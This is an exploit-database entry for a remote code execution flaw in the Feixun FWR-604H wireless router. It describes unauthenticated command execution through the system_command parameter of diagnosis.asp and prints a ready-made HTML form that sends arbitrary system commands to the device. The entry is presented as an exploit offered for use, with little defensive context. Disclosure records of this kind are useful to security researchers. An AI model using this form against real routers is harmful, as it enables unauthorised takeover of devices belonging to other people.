Feixun Wireless Router FWR-604H - Remote Code Execution Exploit

ID 1337DAY-ID-21753
Type zdt
Reporter Arash Abedian
Modified 2014-01-14T00:00:00


Exploit for hardware platform in category web applications

                                            # Exploit Title: [Feixun FWR-604H Wireless Router Remote Code Execution]
# Date: [2014-01-09]
# Exploit Author: [Arash Abedian]
# Vendor Homepage: [http://feixun.com.cn]
# Version: [Hardware Version 1.0, Firmware Build: 7642]
# Tested on: [Hardware Version 1.0, Firmware Build: 7642]
# Vulnerability Details:
Feixun FWR-604H 150Mbps Wireless N Router is vulnerable to Remote Code
Execution vulnerability(Hardware Version 1.0, Firmware Build: 7642, Vendor
website:feixun.com.cn). The web server don't authenticate user prior to
system level execution. As such an unauthenticated attacker can easily
remotely exploit the target using system_command parameter in diagnosis.asp
Exploit Feixun FWR-604H
<input type="hidden" name="doType" value="2">
Command: <input type="text" name="system_command">
<input type="hidden" name="diagnosisResult" value="">
<input type="submit" value="Exploit">

#  0day.today [2016-04-19]  #